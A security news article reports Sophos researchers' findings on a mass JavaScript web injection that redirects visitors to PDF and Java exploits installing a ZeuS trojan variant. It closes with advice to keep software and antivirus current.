14 DAY TRIAL // Security researchers from Sophos warn of a widespread web injection attack that has infected a large number of websites with code distributing a variant of the notorious Zeus trojan.
"Huge numbers of sites have been injected with a malicious JavaScript that attempts to load content from an exploit site when innocent users browse the affected pages," says Fraser Howard, a principal virus researcher at Sophos.
The web injection is very widespread with the malicious code, detected by Sophos as Mal/ObfJS-AB, representing a quarter of all repored threats at the moment.
The attack doesn't seem to be limited to any particular type of website or web server, suggesting that the compromise vector might be stolen FTP accounts.
Since the purpose of the attack is to distribute a variant of the ZeuS information stealing trojan, this theory is even more likely.
The injected code redirects visitors to a third-party page which launches PDF and Java exploits. Successful attacks install a ZeuS variant.
"Perhaps the most interesting thing about this attack is the exploit site JavaScript (the content we block as Mal/ExpJS-N). We have been seeing the same exploit script at the end of spam links and JS/Sinowal-V redirects in recent weeks.
"The script is heavily obfuscated and uses polymorphic and anti-emulation techniques to attempt to evade detection," Howard explains.
The security researcher notes that affected websites span over different hosting providers, so it doesn't appear that any hosting company is targeted in particular, as seen in some mass injection attacks.
Past experiences have shown that website infections like these can persist for months because webmasters have a very slow reaction time. The task of protecting themselves falls with users.
People are strongly advised to keep all of their software up to date, especially the operating system, browsers and their plug-ins (Java, Adobe Reader, Flash Player, etc.). Running an up-to-date antivirus program capable of scanning web traffic is equally important.